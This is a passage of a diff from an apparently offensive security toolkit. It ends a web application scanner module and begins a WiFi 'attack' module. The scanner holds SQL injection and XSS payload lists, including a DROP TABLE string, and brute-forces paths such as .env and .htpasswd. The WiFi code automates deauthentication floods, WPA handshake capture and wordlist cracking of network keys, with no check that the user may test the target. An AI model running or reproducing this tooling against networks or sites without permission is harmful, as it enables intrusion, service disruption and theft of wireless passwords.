'Bootstrap': {'headers': [], 'body': ['bootstrap.min.css', 'bootstrap.min.js'], 'cookies': []},
}
SECURITY_HEADERS = [
'Content-Security-Policy',
'X-Content-Type-Options',
'X-Frame-Options',
'X-XSS-Protection',
'Strict-Transport-Security',
'Referrer-Policy',
'Permissions-Policy',
'Cross-Origin-Opener-Policy',
'Cross-Origin-Resource-Policy',
'Cross-Origin-Embedder-Policy',
]
# Common directories for bruteforce
DIR_WORDLIST_SMALL = [
'admin', 'login', 'wp-admin', 'administrator', 'phpmyadmin', 'cpanel',
'dashboard', 'api', 'backup', 'config', 'db', 'debug', 'dev', 'docs',
'dump', 'env', 'git', 'hidden', 'include', 'internal', 'log', 'logs',
'old', 'panel', 'private', 'secret', 'server-status', 'shell', 'sql',
'staging', 'status', 'temp', 'test', 'tmp', 'upload', 'uploads',
'wp-content', 'wp-includes', '.env', '.git', '.htaccess', '.htpasswd',
'robots.txt', 'sitemap.xml', 'crossdomain.xml', 'web.config',
'composer.json', 'package.json', '.svn', '.DS_Store',
'cgi-bin', 'server-info', 'info.php', 'phpinfo.php', 'xmlrpc.php',
'wp-login.php', '.well-known', 'favicon.ico', 'humans.txt',
]
# SQLi test payloads
SQLI_PAYLOADS = [
"'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1",
"' OR 1=1--", "\" OR 1=1--", "'; DROP TABLE--",
"1' AND '1'='1", "1 AND 1=1", "1 UNION SELECT NULL--",
"' UNION SELECT NULL,NULL--", "1'; WAITFOR DELAY '0:0:5'--",
"1' AND SLEEP(5)--",
]
# XSS test payloads
XSS_PAYLOADS = [
'<script>alert(1)</script>',
'"><script>alert(1)</script>',
"'><script>alert(1)</script>",
'<img src=x onerror=alert(1)>',
'<svg onload=alert(1)>',
'"><img src=x onerror=alert(1)>',
"javascript:alert(1)",
'<body onload=alert(1)>',
]
# SQL error signatures
SQL_ERRORS = [
'sql syntax', 'mysql_fetch', 'mysql_num_rows', 'mysql_query',
'pg_query', 'pg_exec', 'sqlite3', 'SQLSTATE',
'ORA-', 'Microsoft OLE DB', 'Unclosed quotation mark',
'ODBC Microsoft Access', 'JET Database', 'Microsoft SQL Server',
'java.sql.SQLException', 'PostgreSQL query failed',
'supplied argument is not a valid MySQL', 'unterminated quoted string',
]
# ── Scanner Service ───────────────────────────────────────────────────────────
class WebAppScanner:
"""Web application vulnerability scanner."""
def __init__(self):
self._data_dir = os.path.join(get_data_dir(), 'webapp_scanner')
self._results_dir = os.path.join(self._data_dir, 'results')
os.makedirs(self._results_dir, exist_ok=True)
self._active_jobs: Dict[str, dict] = {}
self._session = None
def _get_session(self):
if not _HAS_REQUESTS:
raise RuntimeError('requests library required')
if not self._session:
self._session = requests.Session()
self._session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/120.0.0.0 Safari/537.36',
})
self._session.verify = False
return self._session
# ── Quick Scan ────────────────────────────────────────────────────────
def quick_scan(self, url: str) -> dict:
"""Run a quick scan — headers, tech fingerprint, basic checks."""
if not _HAS_REQUESTS:
return {'ok': False, 'error': 'requests library required'}
url = self._normalize_url(url)
results = {
'url': url,
'scan_time': datetime.now(timezone.utc).isoformat(),
'headers': {},
'security_headers': {},
'technologies': [],
'server': '',
'status_code': 0,
'redirects': [],
'ssl': {},
}
try:
sess = self._get_session()
resp = sess.get(url, timeout=10, allow_redirects=True)
results['status_code'] = resp.status_code
results['headers'] = dict(resp.headers)
results['server'] = resp.headers.get('Server', '')
# Track redirects
for r in resp.history:
results['redirects'].append({
'url': r.url,
'status': r.status_code,
})
# Security headers
results['security_headers'] = self._check_security_headers(resp.headers)
# Technology fingerprint
results['technologies'] = self._fingerprint_tech(resp)
# SSL check
parsed = urlparse(url)
if parsed.scheme == 'https':
results['ssl'] = self._check_ssl(parsed.hostname, parsed.port or 443)
except Exception as e:
results['error'] = str(e)
return results
# ── Directory Bruteforce ──────────────────────────────────────────────
def dir_bruteforce(self, url: str, wordlist: List[str] = None,
extensions: List[str] = None,
threads: int = 10, timeout: float = 5.0) -> dict:
"""Directory bruteforce scan."""
if not _HAS_REQUESTS:
return {'ok': False, 'error': 'requests library required'}
url = self._normalize_url(url).rstrip('/')
if not wordlist:
wordlist = DIR_WORDLIST_SMALL
if not extensions:
extensions = ['']
job_id = f'dirbust_{int(time.time())}'
holder = {'done': False, 'found': [], 'tested': 0,
'total': len(wordlist) * len(extensions)}
self._active_jobs[job_id] = holder
def do_scan():
sess = self._get_session()
results_lock = threading.Lock()
def test_path(path):
for ext in extensions:
full_path = f'{path}{ext}' if ext else path
test_url = f'{url}/{full_path}'
try:
r = sess.get(test_url, timeout=timeout,
allow_redirects=False)
holder['tested'] += 1
if r.status_code not in (404, 403, 500):
with results_lock:
holder['found'].append({
'path': '/' + full_path,
'status': r.status_code,
'size': len(r.content),
'content_type': r.headers.get('Content-Type', ''),
})
except Exception:
holder['tested'] += 1
threads_list = []
for word in wordlist:
t = threading.Thread(target=test_path, args=(word,), daemon=True)
threads_list.append(t)
t.start()
if len(threads_list) >= threads:
for t in threads_list:
t.join(timeout=timeout + 5)
threads_list.clear()
for t in threads_list:
t.join(timeout=timeout + 5)
holder['done'] = True
threading.Thread(target=do_scan, daemon=True).start()
return {'ok': True, 'job_id': job_id}
# ── Subdomain Enumeration ─────────────────────────────────────────────
def subdomain_enum(self, domain: str, wordlist: List[str] = None,
use_ct: bool = True) -> dict:
"""Enumerate subdomains via DNS bruteforce and CT logs."""
found = []
# Certificate Transparency logs
if use_ct and _HAS_REQUESTS:
try:
resp = requests.get(
f'https://crt.sh/?q=%.{domain}&output=json',
timeout=15)
if resp.status_code == 200:
for entry in resp.json():
name = entry.get('name_value', '')
for sub in name.split('\n'):
sub = sub.strip().lower()
if sub.endswith('.' + domain) and sub not in found:
found.append(sub)
except Exception:
pass
# DNS bruteforce
if not wordlist:
wordlist = ['www', 'mail', 'ftp', 'admin', 'api', 'dev',
'staging', 'test', 'blog', 'shop', 'app', 'cdn',
'ns1', 'ns2', 'mx', 'smtp', 'imap', 'pop',
'vpn', 'remote', 'portal', 'webmail', 'secure',
'beta', 'demo', 'docs', 'git', 'jenkins', 'ci',
'grafana', 'kibana', 'prometheus', 'monitor',
'status', 'support', 'help', 'forum', 'wiki',
'internal', 'intranet', 'proxy', 'gateway']
for sub in wordlist:
fqdn = f'{sub}.{domain}'
try:
socket.getaddrinfo(fqdn, None)
if fqdn not in found:
found.append(fqdn)
except socket.gaierror:
pass
return {'ok': True, 'domain': domain, 'subdomains': sorted(set(found)),
'count': len(set(found))}
# ── Vulnerability Scanning ────────────────────────────────────────────
def vuln_scan(self, url: str, scan_sqli: bool = True,
scan_xss: bool = True) -> dict:
"""Scan for SQL injection and XSS vulnerabilities."""
if not _HAS_REQUESTS:
return {'ok': False, 'error': 'requests library required'}
url = self._normalize_url(url)
findings = []
sess = self._get_session()
# Crawl to find forms and parameters
try:
resp = sess.get(url, timeout=10)
body = resp.text
except Exception as e:
return {'ok': False, 'error': str(e)}
# Find URLs with parameters
param_urls = self._extract_param_urls(body, url)
# Test each URL with parameters
for test_url in param_urls[:20]: # Limit to prevent abuse
parsed = urlparse(test_url)
params = dict(p.split('=', 1) for p in parsed.query.split('&')
if '=' in p) if parsed.query else {}
for param_name, param_val in params.items():
if scan_sqli:
sqli_findings = self._test_sqli(sess, test_url, param_name, param_val)
findings.extend(sqli_findings)
if scan_xss:
xss_findings = self._test_xss(sess, test_url, param_name, param_val)
findings.extend(xss_findings)
return {
'ok': True,
'url': url,
'findings': findings,
'urls_tested': len(param_urls[:20]),
}
def _test_sqli(self, sess, url: str, param: str, original_val: str) -> List[dict]:
"""Test a parameter for SQL injection."""
findings = []
parsed = urlparse(url)
base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
if '=' in p) if parsed.query else {}
for payload in SQLI_PAYLOADS[:6]: # Limit payloads
test_params = base_params.copy()
test_params[param] = original_val + payload
try:
test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
r = sess.get(test_url, params=test_params, timeout=5)
body = r.text.lower()
for error_sig in SQL_ERRORS:
if error_sig.lower() in body:
findings.append({
'type': 'sqli',
'severity': 'high',
'url': url,
'parameter': param,
'payload': payload,
'evidence': error_sig,
'description': f'SQL injection (error-based) in parameter "{param}"',
})
return findings # One finding per param is enough
except Exception:
continue
return findings
def _test_xss(self, sess, url: str, param: str, original_val: str) -> List[dict]:
"""Test a parameter for reflected XSS."""
findings = []
parsed = urlparse(url)
base_params = dict(p.split('=', 1) for p in parsed.query.split('&')
if '=' in p) if parsed.query else {}
for payload in XSS_PAYLOADS[:4]:
test_params = base_params.copy()
test_params[param] = payload
try:
test_url = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
r = sess.get(test_url, params=test_params, timeout=5)
if payload in r.text:
findings.append({
'type': 'xss',
'severity': 'high',
'url': url,
'parameter': param,
'payload': payload,
'description': f'Reflected XSS in parameter "{param}"',
})
return findings
except Exception:
continue
return findings
def _extract_param_urls(self, html: str, base_url: str) -> List[str]:
"""Extract URLs with parameters from HTML."""
urls = set()
# href/src/action attributes
for match in re.finditer(r'(?:href|src|action)=["\']([^"\']+\?[^"\']+)["\']', html):
u = match.group(1)
full = urljoin(base_url, u)
if urlparse(full).netloc == urlparse(base_url).netloc:
urls.add(full)
return list(urls)
# ── Security Headers ──────────────────────────────────────────────────
def _check_security_headers(self, headers) -> dict:
"""Check for presence and values of security headers."""
results = {}
for h in SECURITY_HEADERS:
value = headers.get(h, '')
results[h] = {
'present': bool(value),
'value': value,
'rating': 'good' if value else 'missing',
}
# Specific checks
csp = headers.get('Content-Security-Policy', '')
if csp:
if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
results['Content-Security-Policy']['rating'] = 'weak'
hsts = headers.get('Strict-Transport-Security', '')
if hsts:
if 'max-age' in hsts:
try:
age = int(re.search(r'max-age=(\d+)', hsts).group(1))
if age < 31536000:
results['Strict-Transport-Security']['rating'] = 'weak'
except Exception:
pass
return results
# ── Technology Fingerprinting ─────────────────────────────────────────
def _fingerprint_tech(self, resp) -> List[str]:
"""Identify technologies from response."""
techs = []
headers_str = '\n'.join(f'{k}: {v}' for k, v in resp.headers.items())
body = resp.text[:50000] # Only check first 50KB
cookies_str = ' '.join(resp.cookies.keys()) if resp.cookies else ''
for tech, sigs in TECH_SIGNATURES.items():
found = False
for h_sig in sigs['headers']:
if h_sig.lower() in headers_str.lower():
found = True
break
if not found:
for b_sig in sigs['body']:
if b_sig.lower() in body.lower():
found = True
break
if not found:
for c_sig in sigs['cookies']:
if c_sig.lower() in cookies_str.lower():
found = True
break
if found:
techs.append(tech)
return techs
# ── SSL/TLS Audit ─────────────────────────────────────────────────────
def _check_ssl(self, hostname: str, port: int = 443) -> dict:
"""Check SSL/TLS configuration."""
result = {
'valid': False,
'issuer': '',
'subject': '',
'expires': '',
'protocol': '',
'cipher': '',
'issues': [],
}
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s:
s.settimeout(5)
s.connect((hostname, port))
cert = s.getpeercert(True)
result['protocol'] = s.version()
result['cipher'] = s.cipher()[0] if s.cipher() else ''
# Try with verification
ctx2 = ssl.create_default_context()
try:
with ctx2.wrap_socket(socket.socket(), server_hostname=hostname) as s2:
s2.settimeout(5)
s2.connect((hostname, port))
cert = s2.getpeercert()
result['valid'] = True
result['issuer'] = dict(x[0] for x in cert.get('issuer', []))
result['subject'] = dict(x[0] for x in cert.get('subject', []))
result['expires'] = cert.get('notAfter', '')
except ssl.SSLCertVerificationError as e:
result['issues'].append(f'Certificate validation failed: {e}')
# Check for weak protocols
if result['protocol'] in ('TLSv1', 'TLSv1.1', 'SSLv3'):
result['issues'].append(f'Weak protocol: {result["protocol"]}')
except Exception as e:
result['error'] = str(e)
return result
# ── Crawler ───────────────────────────────────────────────────────────
def crawl(self, url: str, max_pages: int = 50, depth: int = 3) -> dict:
"""Spider a website and build a sitemap."""
if not _HAS_REQUESTS:
return {'ok': False, 'error': 'requests library required'}
url = self._normalize_url(url)
base_domain = urlparse(url).netloc
visited: Set[str] = set()
pages = []
queue = [(url, 0)]
sess = self._get_session()
while queue and len(visited) < max_pages:
current_url, current_depth = queue.pop(0)
if current_url in visited or current_depth > depth:
continue
visited.add(current_url)
try:
r = sess.get(current_url, timeout=5, allow_redirects=True)
page = {
'url': current_url,
'status': r.status_code,
'content_type': r.headers.get('Content-Type', ''),
'size': len(r.content),
'title': '',
'forms': 0,
'links_out': 0,
}
# Extract title
title_match = re.search(r'<title[^>]*>([^<]+)</title>', r.text, re.I)
if title_match:
page['title'] = title_match.group(1).strip()
# Count forms
page['forms'] = len(re.findall(r'<form', r.text, re.I))
# Extract links for further crawling
links = re.findall(r'href=["\']([^"\']+)["\']', r.text)
outlinks = 0
for link in links:
full_link = urljoin(current_url, link)
parsed = urlparse(full_link)
if parsed.netloc == base_domain:
clean = f'{parsed.scheme}://{parsed.netloc}{parsed.path}'
if clean not in visited:
queue.append((clean, current_depth + 1))
else:
outlinks += 1
page['links_out'] = outlinks
pages.append(page)
except Exception:
continue
return {
'ok': True,
'url': url,
'pages_crawled': len(pages),
'pages': pages,
}
# ── Job Management ────────────────────────────────────────────────────
def get_job_status(self, job_id: str) -> dict:
holder = self._active_jobs.get(job_id)
if not holder:
return {'ok': False, 'error': 'Job not found'}
result = {
'ok': True,
'done': holder['done'],
'tested': holder['tested'],
'total': holder['total'],
'found': holder['found'],
}
if holder['done']:
self._active_jobs.pop(job_id, None)
return result
# ── Helpers ───────────────────────────────────────────────────────────
@staticmethod
def _normalize_url(url: str) -> str:
url = url.strip()
if not url.startswith(('http://', 'https://')):
url = 'https://' + url
return url
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_webapp_scanner() -> WebAppScanner:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = WebAppScanner()
return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
"""Interactive CLI for Web Application Scanner."""
svc = get_webapp_scanner()
while True:
print("\n╔═══════════════════════════════════════╗")
print("║ WEB APPLICATION SCANNER ║")
print("╠═══════════════════════════════════════╣")
print("║ 1 — Quick Scan (headers + tech) ║")
print("║ 2 — Directory Bruteforce ║")
print("║ 3 — Subdomain Enumeration ║")
print("║ 4 — Vulnerability Scan (SQLi/XSS) ║")
print("║ 5 — Crawl / Spider ║")
print("║ 0 — Back ║")
print("╚═══════════════════════════════════════╝")
choice = input("\n Select: ").strip()
if choice == '0':
break
elif choice == '1':
url = input(" URL: ").strip()
if not url:
continue
print(" Scanning...")
r = svc.quick_scan(url)
print(f"\n Status: {r.get('status_code')}")
print(f" Server: {r.get('server', 'unknown')}")
if r.get('technologies'):
print(f" Technologies: {', '.join(r['technologies'])}")
if r.get('security_headers'):
print(" Security Headers:")
for h, info in r['security_headers'].items():
mark = '\033[92m✓\033[0m' if info['present'] else '\033[91m✗\033[0m'
print(f" {mark} {h}")
if r.get('ssl'):
ssl_info = r['ssl']
print(f" SSL: {'Valid' if ssl_info.get('valid') else 'INVALID'} "
f"({ssl_info.get('protocol', '?')})")
for issue in ssl_info.get('issues', []):
print(f" [!] {issue}")
elif choice == '2':
url = input(" URL: ").strip()
if not url:
continue
print(" Starting directory bruteforce...")
r = svc.dir_bruteforce(url)
if r.get('job_id'):
while True:
time.sleep(2)
s = svc.get_job_status(r['job_id'])
print(f" [{s['tested']}/{s['total']}] Found: {len(s['found'])}", end='\r')
if s['done']:
print()
for item in s['found']:
print(f" [{item['status']}] {item['path']} ({item['size']} bytes)")
break
elif choice == '3':
domain = input(" Domain: ").strip()
if not domain:
continue
print(" Enumerating subdomains...")
r = svc.subdomain_enum(domain)
print(f"\n Found {r['count']} subdomains:")
for sub in r.get('subdomains', []):
print(f" {sub}")
elif choice == '4':
url = input(" URL: ").strip()
if not url:
continue
print(" Scanning for vulnerabilities...")
r = svc.vuln_scan(url)
if r.get('findings'):
print(f"\n Found {len(r['findings'])} potential vulnerabilities:")
for f in r['findings']:
print(f" [{f['severity'].upper()}] {f['type'].upper()}: {f['description']}")
print(f" Parameter: {f.get('parameter', '?')}, Payload: {f.get('payload', '?')}")
else:
print(" No vulnerabilities found in tested parameters.")
elif choice == '5':
url = input(" URL: ").strip()
if not url:
continue
max_pages = int(input(" Max pages (default 50): ").strip() or '50')
print(" Crawling...")
r = svc.crawl(url, max_pages=max_pages)
print(f"\n Crawled {r.get('pages_crawled', 0)} pages:")
for page in r.get('pages', []):
print(f" [{page['status']}] {page['url']}"
f" ({page['size']} bytes, {page['forms']} forms)")

843
modules/wifi_audit.py Normal file
View File

@@ -0,0 +1,843 @@
"""AUTARCH WiFi Auditing
Interface management, network discovery, handshake capture, deauth attack,
rogue AP detection, WPS attack, and packet capture for wireless security auditing.
"""
DESCRIPTION = "WiFi network auditing & attack tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import signal
import shutil
import threading
import subprocess
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Data Structures ──────────────────────────────────────────────────────────
@dataclass
class AccessPoint:
bssid: str
ssid: str = ""
channel: int = 0
encryption: str = ""
cipher: str = ""
auth: str = ""
signal: int = 0
beacons: int = 0
data_frames: int = 0
clients: List[str] = field(default_factory=list)
@dataclass
class WifiClient:
mac: str
bssid: str = ""
signal: int = 0
frames: int = 0
probe: str = ""
# ── WiFi Auditor ─────────────────────────────────────────────────────────────
class WiFiAuditor:
"""WiFi auditing toolkit using aircrack-ng suite."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'wifi')
os.makedirs(self.data_dir, exist_ok=True)
self.captures_dir = os.path.join(self.data_dir, 'captures')
os.makedirs(self.captures_dir, exist_ok=True)
# Tool paths
self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng')
self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng')
self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng')
self.aircrack = find_tool('aircrack-ng') or shutil.which('aircrack-ng')
self.reaver = find_tool('reaver') or shutil.which('reaver')
self.wash = find_tool('wash') or shutil.which('wash')
self.iwconfig = shutil.which('iwconfig')
self.iw = shutil.which('iw')
self.ip_cmd = shutil.which('ip')
# State
self.monitor_interface: Optional[str] = None
self.scan_results: Dict[str, AccessPoint] = {}
self.clients: List[WifiClient] = []
self.known_aps: List[Dict] = []
self._scan_proc: Optional[subprocess.Popen] = None
self._capture_proc: Optional[subprocess.Popen] = None
self._jobs: Dict[str, Dict] = {}
def get_tools_status(self) -> Dict[str, bool]:
"""Check availability of all required tools."""
return {
'airmon-ng': self.airmon is not None,
'airodump-ng': self.airodump is not None,
'aireplay-ng': self.aireplay is not None,
'aircrack-ng': self.aircrack is not None,
'reaver': self.reaver is not None,
'wash': self.wash is not None,
'iwconfig': self.iwconfig is not None,
'iw': self.iw is not None,
'ip': self.ip_cmd is not None,
}
# ── Interface Management ─────────────────────────────────────────────
def get_interfaces(self) -> List[Dict]:
"""List wireless interfaces."""
interfaces = []
# Try iw first
if self.iw:
try:
out = subprocess.check_output([self.iw, 'dev'], text=True, timeout=5)
iface = None
for line in out.splitlines():
line = line.strip()
if line.startswith('Interface'):
iface = {'name': line.split()[-1], 'mode': 'managed', 'channel': 0, 'mac': ''}
elif iface:
if line.startswith('type'):
iface['mode'] = line.split()[-1]
elif line.startswith('channel'):
try:
iface['channel'] = int(line.split()[1])
except (ValueError, IndexError):
pass
elif line.startswith('addr'):
iface['mac'] = line.split()[-1]
if iface:
interfaces.append(iface)
except Exception:
pass
# Fallback to iwconfig
if not interfaces and self.iwconfig:
try:
out = subprocess.check_output([self.iwconfig], text=True,
stderr=subprocess.DEVNULL, timeout=5)
for block in out.split('\n\n'):
if 'IEEE 802.11' in block or 'ESSID' in block:
name = block.split()[0]
mode = 'managed'
if 'Mode:Monitor' in block:
mode = 'monitor'
elif 'Mode:Master' in block:
mode = 'master'
freq_m = re.search(r'Channel[:\s]*(\d+)', block)
ch = int(freq_m.group(1)) if freq_m else 0
interfaces.append({'name': name, 'mode': mode, 'channel': ch, 'mac': ''})
except Exception:
pass
# Fallback: list from /sys
if not interfaces:
try:
wireless_dir = Path('/sys/class/net')
if wireless_dir.exists():
for d in wireless_dir.iterdir():
if (d / 'wireless').exists() or (d / 'phy80211').exists():
interfaces.append({
'name': d.name, 'mode': 'unknown', 'channel': 0, 'mac': ''
})
except Exception:
pass
return interfaces
def enable_monitor(self, interface: str) -> Dict:
"""Put interface into monitor mode."""
if not self.airmon:
return {'ok': False, 'error': 'airmon-ng not found'}
try:
# Kill interfering processes
subprocess.run([self.airmon, 'check', 'kill'],
capture_output=True, text=True, timeout=10)
# Enable monitor mode
result = subprocess.run([self.airmon, 'start', interface],
capture_output=True, text=True, timeout=10)
# Detect monitor interface name (usually wlan0mon or similar)
mon_iface = interface + 'mon'
for line in result.stdout.splitlines():
m = re.search(r'\(monitor mode.*enabled.*on\s+(\S+)\)', line, re.I)
if m:
mon_iface = m.group(1)
break
m = re.search(r'monitor mode.*vif.*enabled.*for.*\[(\S+)\]', line, re.I)
if m:
mon_iface = m.group(1)
break
self.monitor_interface = mon_iface
return {'ok': True, 'interface': mon_iface, 'message': f'Monitor mode enabled on {mon_iface}'}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': 'Timeout enabling monitor mode'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def disable_monitor(self, interface: str = None) -> Dict:
"""Disable monitor mode and restore managed mode."""
if not self.airmon:
return {'ok': False, 'error': 'airmon-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface specified'}
try:
result = subprocess.run([self.airmon, 'stop', iface],
capture_output=True, text=True, timeout=10)
self.monitor_interface = None
# Restart network manager
subprocess.run(['systemctl', 'start', 'NetworkManager'],
capture_output=True, timeout=5)
return {'ok': True, 'message': f'Monitor mode disabled on {iface}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def set_channel(self, interface: str, channel: int) -> Dict:
"""Set wireless interface channel."""
if self.iw:
try:
subprocess.run([self.iw, 'dev', interface, 'set', 'channel', str(channel)],
capture_output=True, text=True, timeout=5)
return {'ok': True, 'channel': channel}
except Exception as e:
return {'ok': False, 'error': str(e)}
return {'ok': False, 'error': 'iw not found'}
# ── Network Scanning ─────────────────────────────────────────────────
def scan_networks(self, interface: str = None, duration: int = 15) -> Dict:
"""Scan for nearby wireless networks using airodump-ng."""
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface. Enable monitor mode first.'}
if not self.airodump:
return {'ok': False, 'error': 'airodump-ng not found'}
prefix = os.path.join(self.captures_dir, f'scan_{int(time.time())}')
try:
proc = subprocess.Popen(
[self.airodump, '--output-format', 'csv', '-w', prefix, iface],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
time.sleep(duration)
proc.send_signal(signal.SIGINT)
proc.wait(timeout=5)
# Parse CSV output
csv_file = prefix + '-01.csv'
if os.path.exists(csv_file):
self._parse_airodump_csv(csv_file)
return {
'ok': True,
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
'clients': [self._client_to_dict(c) for c in self.clients],
'count': len(self.scan_results)
}
return {'ok': False, 'error': 'No scan output produced'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def _parse_airodump_csv(self, filepath: str):
"""Parse airodump-ng CSV output."""
self.scan_results.clear()
self.clients.clear()
try:
with open(filepath, 'r', errors='ignore') as f:
content = f.read()
# Split into AP section and client section
sections = content.split('Station MAC')
ap_section = sections[0] if sections else ''
client_section = sections[1] if len(sections) > 1 else ''
# Parse APs
for line in ap_section.splitlines():
parts = [p.strip() for p in line.split(',')]
if len(parts) >= 14 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
bssid = parts[0].upper()
ap = AccessPoint(
bssid=bssid,
channel=int(parts[3]) if parts[3].strip().isdigit() else 0,
signal=int(parts[8]) if parts[8].strip().lstrip('-').isdigit() else 0,
encryption=parts[5].strip(),
cipher=parts[6].strip(),
auth=parts[7].strip(),
beacons=int(parts[9]) if parts[9].strip().isdigit() else 0,
data_frames=int(parts[10]) if parts[10].strip().isdigit() else 0,
ssid=parts[13].strip() if len(parts) > 13 else ''
)
self.scan_results[bssid] = ap
# Parse clients
for line in client_section.splitlines():
parts = [p.strip() for p in line.split(',')]
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
client = WifiClient(
mac=parts[0].upper(),
signal=int(parts[3]) if parts[3].strip().lstrip('-').isdigit() else 0,
frames=int(parts[4]) if parts[4].strip().isdigit() else 0,
bssid=parts[5].strip().upper() if len(parts) > 5 else '',
probe=parts[6].strip() if len(parts) > 6 else ''
)
self.clients.append(client)
# Associate with AP
if client.bssid in self.scan_results:
self.scan_results[client.bssid].clients.append(client.mac)
except Exception:
pass
def get_scan_results(self) -> Dict:
"""Return current scan results."""
return {
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
'clients': [self._client_to_dict(c) for c in self.clients],
'count': len(self.scan_results)
}
# ── Handshake Capture ────────────────────────────────────────────────
def capture_handshake(self, interface: str, bssid: str, channel: int,
deauth_count: int = 5, timeout: int = 60) -> str:
"""Capture WPA handshake. Returns job_id for async polling."""
job_id = f'handshake_{int(time.time())}'
self._jobs[job_id] = {
'type': 'handshake', 'status': 'running', 'bssid': bssid,
'result': None, 'started': time.time()
}
def _capture():
try:
# Set channel
self.set_channel(interface, channel)
prefix = os.path.join(self.captures_dir, f'hs_{bssid.replace(":", "")}_{int(time.time())}')
# Start capture
cap_proc = subprocess.Popen(
[self.airodump, '-c', str(channel), '--bssid', bssid,
'-w', prefix, interface],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
# Send deauths after short delay
time.sleep(3)
if self.aireplay:
subprocess.run(
[self.aireplay, '-0', str(deauth_count), '-a', bssid, interface],
capture_output=True, timeout=15
)
# Wait for handshake
cap_file = prefix + '-01.cap'
start = time.time()
captured = False
while time.time() - start < timeout:
if os.path.exists(cap_file) and self.aircrack:
check = subprocess.run(
[self.aircrack, '-a', '2', '-b', bssid, cap_file],
capture_output=True, text=True, timeout=10
)
if '1 handshake' in check.stdout.lower() or 'valid handshake' in check.stdout.lower():
captured = True
break
time.sleep(2)
cap_proc.send_signal(signal.SIGINT)
cap_proc.wait(timeout=5)
if captured:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True, 'capture_file': cap_file, 'bssid': bssid,
'message': f'Handshake captured for {bssid}'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'Handshake capture timed out',
'capture_file': cap_file if os.path.exists(cap_file) else None
}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_capture, daemon=True).start()
return job_id
def crack_handshake(self, capture_file: str, wordlist: str, bssid: str = None) -> str:
"""Crack captured handshake with wordlist. Returns job_id."""
if not self.aircrack:
return ''
job_id = f'crack_{int(time.time())}'
self._jobs[job_id] = {
'type': 'crack', 'status': 'running',
'result': None, 'started': time.time()
}
def _crack():
try:
cmd = [self.aircrack, '-w', wordlist, '-b', bssid, capture_file] if bssid else \
[self.aircrack, '-w', wordlist, capture_file]
result = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
# Parse result
key_match = re.search(r'KEY FOUND!\s*\[\s*(.+?)\s*\]', result.stdout)
if key_match:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True, 'key': key_match.group(1), 'message': 'Key found!'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'Key not found in wordlist'
}
except subprocess.TimeoutExpired:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': 'Crack timeout (1hr)'}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_crack, daemon=True).start()
return job_id
# ── Deauth Attack ────────────────────────────────────────────────────
def deauth(self, interface: str, bssid: str, client: str = None,
count: int = 10) -> Dict:
"""Send deauthentication frames."""
if not self.aireplay:
return {'ok': False, 'error': 'aireplay-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
try:
cmd = [self.aireplay, '-0', str(count), '-a', bssid]
if client:
cmd += ['-c', client]
cmd.append(iface)
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
return {
'ok': True,
'message': f'Sent {count} deauth frames to {bssid}' +
(f' targeting {client}' if client else ' (broadcast)'),
'output': result.stdout
}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': 'Deauth timeout'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Rogue AP Detection ───────────────────────────────────────────────
def save_known_aps(self):
"""Save current scan as known/baseline APs."""
self.known_aps = [self._ap_to_dict(ap) for ap in self.scan_results.values()]
known_file = os.path.join(self.data_dir, 'known_aps.json')
with open(known_file, 'w') as f:
json.dump(self.known_aps, f, indent=2)
return {'ok': True, 'count': len(self.known_aps)}
def load_known_aps(self) -> List[Dict]:
"""Load previously saved known APs."""
known_file = os.path.join(self.data_dir, 'known_aps.json')
